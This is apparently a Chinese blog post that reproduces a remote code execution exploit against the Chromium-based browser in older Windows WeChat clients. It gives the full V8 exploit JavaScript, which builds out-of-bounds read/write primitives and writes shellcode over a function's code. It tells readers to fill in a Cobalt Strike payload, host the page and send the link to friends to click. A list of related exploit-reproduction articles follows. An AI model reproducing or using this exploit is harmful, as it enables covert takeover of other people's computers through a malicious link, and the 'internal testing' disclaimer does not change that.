由于微信采用的是google内核,前些日子google爆出0day远程代码执行漏洞,但是需要关闭沙箱,而微信采用的是老版本google内核,默认关闭沙箱,因此只要微信用户点击恶意连接,可直接获取该PC电脑权限

影响版本

<=3.2.1.141(Windows系统)

声明:

本文章只是内部做测试,请大家不要恶意攻击他人,请遵守法律法规。违者,后果自负。

本文章只是内部做测试,请大家不要恶意攻击他人,请遵守法律法规。违者,后果自负。

本文章只是内部做测试,请大家不要恶意攻击他人,请遵守法律法规。违者,后果自负。

打开cs4.0生成一个payload



将文件保存本地后提取其中的shellcode,将shellcode填入下方代码

ENABLE_LOG = true;

 IN_WORKER = true;

 // run calc and hang in a loop

 var shellcode = [#shellcode];//shellcode替换成自己的

 function print(data) {

 }

 var not_optimised_out = 0;

 var target_function = (function (value) {

   if (value == 0xdecaf0) {

       not_optimised_out += 1;

   }

   not_optimised_out += 1;

   not_optimised_out |= 0xff;

   not_optimised_out *= 12;

});

for (var i = 0; i < 0x10000; ++i) {

   target_function(i);

}

var g_array;

var tDerivedNCount = 17 * 87481 - 8;

var tDerivedNDepth = 19 * 19;

function cb(flag) {

   if (flag == true) {

       return;

   }

   g_array = new Array(0);

   g_array[0] = 0x1dbabe * 2;

   return 'c01db33f';

}

function gc() {

   for (var i = 0; i < 0x10000; ++i) {

       new String();

   }

}

function oobAccess() {

   var this_ = this;

   this.buffer = null;

   this.buffer_view = null;

   this.page_buffer = null;

   this.page_view = null;

   this.prevent_opt = [];

   var kSlotOffset = 0x1f;

   var kBackingStoreOffset = 0xf;

   class LeakArrayBuffer extends ArrayBuffer {

       constructor() {

           super(0x1000);

           this.slot = this;

       }

   }

   this.page_buffer = new LeakArrayBuffer();

   this.page_view = new DataView(this.page_buffer);

   new RegExp({ toString: function () { return 'a' } });

   cb(true);

   class DerivedBase extends RegExp {

       constructor() {

           // var array = null;

           super(

               // at this point, the 4-byte allocation for the JSRegExp `this` object

               // has just happened.

               {

                   toString: cb

               }, 'g'

               // now the runtime JSRegExp constructor is called, corrupting the

               // JSArray.

           );

           // this allocation will now directly follow the FixedArray allocation

           // made for `this.data`, which is where `array.elements` points to.

           this_.buffer = new ArrayBuffer(0x80);

           g_array[8] = this_.page_buffer;

       }

   }

   // try{

   var derived_n = eval(`(function derived_n(i) {

       if (i == 0) {

           return DerivedBase;

       }

       class DerivedN extends derived_n(i-1) {

           constructor() {

               super();

               return;

               ${"this.a=0;".repeat(tDerivedNCount)}

           }

       }

       return DerivedN;

   })`);

   gc();

   new (derived_n(tDerivedNDepth))();

   this.buffer_view = new DataView(this.buffer);

   this.leakPtr = function (obj) {

       this.page_buffer.slot = obj;

       return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt);

   }

   this.setPtr = function (addr) {

       this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt);

   }

   this.read32 = function (addr) {

       this.setPtr(addr);

       return this.page_view.getUint32(0, true, ...this.prevent_opt);

   }

   this.write32 = function (addr, value) {

       this.setPtr(addr);

       this.page_view.setUint32(0, value, true, ...this.prevent_opt);

   }

   this.write8 = function (addr, value) {

       this.setPtr(addr);

       this.page_view.setUint8(0, value, ...this.prevent_opt);

   }

   this.setBytes = function (addr, content) {

       for (var i = 0; i < content.length; i++) {

           this.write8(addr + i, content[i]);

       }

   }

   return this;

}

function trigger() {

   var oob = oobAccess();

   var func_ptr = oob.leakPtr(target_function);

   print('[*] target_function at 0x' + func_ptr.toString(16));

   var kCodeInsOffset = 0x1b;

   var code_addr = oob.read32(func_ptr + kCodeInsOffset);

   print('[*] code_addr at 0x' + code_addr.toString(16));

   oob.setBytes(code_addr, shellcode);

   target_function(0);

}

try{

   print("start running");

   trigger();

}catch(e){

   print(e);

}

再生成一个html文件调用js文件



存放在网站目录下

生成链接 http://ip/test.html 发给好友点击即可。

微信0day复现的更多相关文章

  1. 【Python】CVE-2017-10271批量自查POC(Weblogic RCE)

    1.说明 看到大家对weblogic漏洞这么热衷,于是也看看这个漏洞的测试方式. 找了几个安全研究员的博客分析,经过几天的摸索大体清楚漏洞由XMLDecoder的反序列化产生. 漏洞最早4月份被发现, ...

  2. python 微信跳一跳辅助 复现

    本来用的是苹果ios得手机,但是步骤较为复杂,没有吃透,最后妥协用了android的机器搞得. 首先找到大牛的github https://github.com/wangshub/wechat_jum ...

  3. Flash 0day漏洞(CVE-2018-4878)复现

    该漏洞影响 Flash Player 当前最新版本28.0.0.137以及之前的所有版本,而Adobe公司计划在当地时间2月5日紧急发布更新来修复此漏洞. 本文作者:i春秋作家——F0rmat 前言 ...

  4. Flash 0day CVE-2018-4878 漏洞复现

      0x01 前言 Adobe公司在当地时间2018年2月1日发布了一条安全公告: https://helpx.adobe.com/security/products/flash-player/aps ...

  5. 双杀 0day 漏洞(CVE-2018-8174)复现

    漏洞描述: CVE-2018-8174 是 Windows VBScript Engine 代码执行漏洞. 微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该 0day 漏洞进行了修 ...

  6. Flash 0day(CVE-2018-4878)复现过程

    一.前言介绍 2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878). 从Ad ...

  7. 由Chromium内核引起的微信内置浏览器rce漏洞复现

    背景 chrome浏览器爆出漏洞,github上公开了poc:https://github.com/r4j0x00/exploits/tree/master/chrome-0day,在关闭chrome ...

  8. 本地复现Flash 0day漏洞(CVE-2018-4878)

    影响版本: Adobe Flash Player <= 28.0.0.137 EXP下载地址: 链接: https://pan.baidu.com/s/1_VVQfdx6gsJvEDJj51Jg ...

  9. 20155306 白皎 0day漏洞——漏洞的复现

    一.Ubuntu16.04 (CVE-2017-16995) 1.漏洞概述 Ubuntu最新版本16.04存在本地提权漏洞,该漏洞存在于Linux内核带有的eBPF bpf(2)系统调用中,当用户提供 ...

随机推荐

  1. VsCode 常用插件清单

    插件离线安装说明 在一些内网开发环境中,无法做到在线安装,这个时候就需要对插件进行离线安装 了 打开 VSCode 插件市场网址 Extensions for the Visual Studio fa ...

  2. Java的虚拟线程(协程)特性开启预览阶段,多线程开发的难度将大大降低

    高并发.多线程一直是Java编程中的难点,也是面试题中的要点.Java开发者也一直在尝试使用多线程来解决应用服务器的并发问题.但是多线程并不容易,为此一个新的技术出现了,这就是虚拟线程. 传统多线程的 ...

  3. 企业DevOps之路:Jenkins 流水线

    1. Pipeline 概述 Pipeline 即流水线,是 jenkins2.X 的新特性,是 jenkins 官方推荐使用的持续集成方案.与传统的自由风格项目不同,它是通过 jenkins DSL ...

  4. js 轮播图 (原生)

    注 : 此处内容较多, 只显示代码, 具体讲解看注释.  具体参考 "黑马 pink老师"   https://www.bilibili.com/video/BV1Sy4y1C7h ...

  5. 你能知道的或者不知道的shell变量都在这里

    第2章 shell变量讲解 2.1 shell中的变量讲解 2.1.1 什么是shell变量 变量的本质就是内存中的一块区域 变量名 位置 变量是脚本中经常会使用的内容信息 变量可以在脚本中直接使用 ...

  6. selenium模块获得js动态数据-17track为例

    通过selenium模块驱动Chrome浏览器,获得js动态数据,以17track为例:通过运单号查询最新的物流信息 1 import re 2 from time import sleep 3 fr ...

  7. 1.7 Linux系统的优缺点

    本节,我们介绍一下 Linux 系统的优缺点.Linux 不可比拟的优势如下. 1) 大量的可用软件及免费软件 Linux 系统上有着大量的可用软件,且绝大多数是免费的,比如声名赫赫的 Apache. ...

  8. CRM项目的整理---第一篇

    CRM:cunstomer relationship management  客户管理系统 1.项目的使用者:销售  班主任    讲师  助教 2.项目的需求分析 2.1.注册 2.2.登录 2.3 ...

  9. 羽夏 Bash 简明教程(下)

    写在前面   该文章根据 the unix workbench 中的 Bash Programming 进行汉化处理并作出自己的整理,并参考 Bash 脚本教程 和 BashPitfalls 相关内容 ...

  10. Spring Boot整合模板引擎freemarker

    jsp本质是servlet,渲染都在服务器,freemarker模板引擎也是在服务器端渲染. 项目结构 引入依赖pom.xml <!-- 引入 freemarker 模板依赖 --> &l ...